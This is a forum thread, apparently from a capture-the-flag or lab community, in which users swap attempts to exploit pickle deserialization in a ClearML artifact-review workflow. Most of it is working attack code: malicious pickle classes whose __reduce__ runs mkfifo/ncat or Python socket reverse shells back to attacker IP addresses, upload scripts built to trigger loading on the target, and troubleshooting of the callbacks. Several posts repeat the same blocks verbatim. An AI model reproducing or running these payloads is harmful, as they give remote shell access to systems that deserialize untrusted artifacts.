[ritualist]

what shell u used ? python or bash ?

---

the shell returns from my machine ?? why connect to [10.10.14.216] from (UNKNOWN) [10.10.14.216] 52776

Try this one

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.10.10 4242 >/tmp/f

[osamy7593]

what shell u used ? python or bash ?

---

the shell returns from my machine ?? why connect to [10.10.14.216] from (UNKNOWN) [10.10.14.216] 52776

Try this one

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.10.10 4242 >/tmp/f

bro where can i upload the malicious_artifact.pkl

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed

[Szakyro]

Did anyone manage to make chad jpt to review their code there?

I can't seem to be able to make him do it


Also my pickle keeps getting deleted

[medo5120]

Here's what i'm trying but i don't seem to get results

import pickle
import os

class RunCommand:
def __reduce__(self):
return(os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.xx.xx 9001 >/tmp/f',))

command = RunCommand()
with open('pickle_artifact', 'wb') as f:
pickle.dump(command, f)

and then


import subprocess
import json
from clearml import Task

# Create a new ClearML task
task = Task.init(project_name="Black Swan", task_name="DoD Artifact Test")

# Add the "review" tag to the task
task.set_tags(["review"])


# Log the JSON artifact to the ClearML task
task.upload_artifact(name="pickle_file", artifact_object='pickle_artifact')

# Close the task
task.close()

but no code execution so far

[jojo1234]

Here's what i'm trying but i don't seem to get results

import pickle
import os

class RunCommand:
    def __reduce__(self):
        return(os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.xx.xx 9001 >/tmp/f',))

command = RunCommand()
with open('pickle_artifact', 'wb') as f:
    pickle.dump(command, f)

and then


import subprocess
import json
from clearml import Task

# Create a new ClearML task
task = Task.init(project_name="Black Swan", task_name="DoD Artifact Test")

# Add the "review" tag to the task
task.set_tags(["review"])


# Log the JSON artifact to the ClearML task
task.upload_artifact(name="pickle_file", artifact_object='pickle_artifact')

# Close the task
task.close()

but no code execution so far

where did u upload a task coz i don't see it

[Szakyro]

So nothing works for me and this is what I tried:

from clearml import Task, StorageManager
import os

pickle_filename = 'reverse_shell.pickle'

if not os.path.isfile(pickle_filename):
print(f"File '{pickle_filename}' does not exist.")
exit()

project_name = 'Black Swan'
task_name = 'Exploit'

task = Task.init(project_name=project_name, task_name=task_name, task_type=Task.TaskTypes.training)
print(f"ClearML Task created with ID: {task.id}")

task.set_tags(["Review"])
print(f"Tag 'review' added to the task.")

artifact_name = 'reverse_shell_artifact'
task.upload_artifact(name=artifact_name, artifact_object=pickle_filename)
print(f"Pickle file '{pickle_filename}' uploaded as artifact '{artifact_name}'.")

task.close()

--------------------------------------------------

import pickle
import os

class RunCommand:
def __reduce__(self):
command = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.x.x",7001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
return (os.system, (command,))

command_obj = RunCommand()

pickle_filename = 'reverse_shell.pickle'

with open(pickle_filename, 'wb') as f:
pickle.dump(command_obj, f)

print(f"Pickle file '{pickle_filename}' created.")


Maybe you have more luck, also I can't seem to be able to get him to review the code.

[medo5120]

Here's what i'm trying but i don't seem to get results

import pickle
import os

class RunCommand:
    def __reduce__(self):
        return(os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.xx.xx 9001 >/tmp/f',))

command = RunCommand()
with open('pickle_artifact', 'wb') as f:
    pickle.dump(command, f)

and then


import subprocess
import json
from clearml import Task

# Create a new ClearML task
task = Task.init(project_name="Black Swan", task_name="DoD Artifact Test")

# Add the "review" tag to the task
task.set_tags(["review"])


# Log the JSON artifact to the ClearML task
task.upload_artifact(name="pickle_file", artifact_object='pickle_artifact')

# Close the task
task.close()

but no code execution so far

where did u upload a task coz i don't see it

You need to install clearml, then clearml-init using the configuration found in profile->settings->workspace, create new credentials

I'm also in the same boat as 2 comments above, my code gets reviewed, but I fail the artifaction isn't dict check

import pickle
import os

class RunCommand():
    def __reduce__(self):
        return (os.system, ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|ncat 10.10.14.186 8000 >/tmp/f",))

command = RunCommand()

with open('pickle_artifact.pkl', 'wb') as f:
    pickle.dump({"cmd": command}, f)

import os
import pickle
from clearml import Task

task = Task.init(project_name='Black Swan', task_name='Generate and Upload Pickle', tags=["review"], task_type=Task.TaskTypes.data_processing)

task.upload_artifact(name='pickle_artifact', artifact_object="pickle_artifact.pkl")

task.execute_remotely(queue_name='default')

python <name_of_the_last_file.py>

I already have it setup and I can get the artifact to be reviewed, but no code execution, no ping, curl, NC ... nothing goes back to me

[medo5120]

Here's what i'm trying but i don't seem to get results

import pickle
import os

class RunCommand:
    def __reduce__(self):
        return(os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 10.10.xx.xx 9001 >/tmp/f',))

command = RunCommand()
with open('pickle_artifact', 'wb') as f:
    pickle.dump(command, f)

and then


import subprocess
import json
from clearml import Task

# Create a new ClearML task
task = Task.init(project_name="Black Swan", task_name="DoD Artifact Test")

# Add the "review" tag to the task
task.set_tags(["review"])


# Log the JSON artifact to the ClearML task
task.upload_artifact(name="pickle_file", artifact_object='pickle_artifact')

# Close the task
task.close()

but no code execution so far

where did u upload a task coz i don't see it

You need to install clearml, then clearml-init using the configuration found in profile->settings->workspace, create new credentials

I'm also in the same boat as 2 comments above, my code gets reviewed, but I fail the artifaction isn't dict check

import pickle
import os

class RunCommand():
    def __reduce__(self):
        return (os.system, ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|ncat 10.10.14.186 8000 >/tmp/f",))

command = RunCommand()

with open('pickle_artifact.pkl', 'wb') as f:
    pickle.dump({"cmd": command}, f)

import os
import pickle
from clearml import Task

task = Task.init(project_name='Black Swan', task_name='Generate and Upload Pickle', tags=["review"], task_type=Task.TaskTypes.data_processing)

task.upload_artifact(name='pickle_artifact', artifact_object="pickle_artifact.pkl")

task.execute_remotely(queue_name='default')

python <name_of_the_last_file.py>

I already have it setup and I can get the artifact to be reviewed, but no code execution, no ping, curl, NC ... nothing goes back to me

Have you checked the logs of the experiment run by Chad Jippity? Do you pass the "artifact X content is not a dictionary"?

I Don't think we need to, from what I understand, the exploit in tasks.get, then it checks if the artifact is a dictionary or not. The tasks.get already executes and the pickle is loaded on the machine, hence the "artifact" is not a dictionary" , but I might be wrong

[maggi]

where did u upload a task coz i don't see it

You need to install clearml, then clearml-init using the configuration found in profile->settings->workspace, create new credentials

I'm also in the same boat as 2 comments above, my code gets reviewed, but I fail the artifaction isn't dict check

import pickle
import os

class RunCommand():
    def __reduce__(self):
        return (os.system, ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|ncat 10.10.14.186 8000 >/tmp/f",))

command = RunCommand()

with open('pickle_artifact.pkl', 'wb') as f:
    pickle.dump({"cmd": command}, f)

import os
import pickle
from clearml import Task

task = Task.init(project_name='Black Swan', task_name='Generate and Upload Pickle', tags=["review"], task_type=Task.TaskTypes.data_processing)

task.upload_artifact(name='pickle_artifact', artifact_object="pickle_artifact.pkl")

task.execute_remotely(queue_name='default')

python <name_of_the_last_file.py>

I already have it setup and I can get the artifact to be reviewed, but no code execution, no ping, curl, NC ... nothing goes back to me

Have you checked the logs of the experiment run by Chad Jippity? Do you pass the "artifact X content is not a dictionary"?

I Don't think we need to, from what I understand, the exploit in tasks.get, then it checks if the artifact is a dictionary or not. The tasks.get already executes and the pickle is loaded on the machine, hence the "artifact" is not a dictionary" , but I might be wrong

the docs mention credentials and a secret?

[osamy7593]

why

ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring
Ncat: Connection refused.
The content of 'malicious_artifact1.pkl' is not callable.

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Asking for rep is not allowed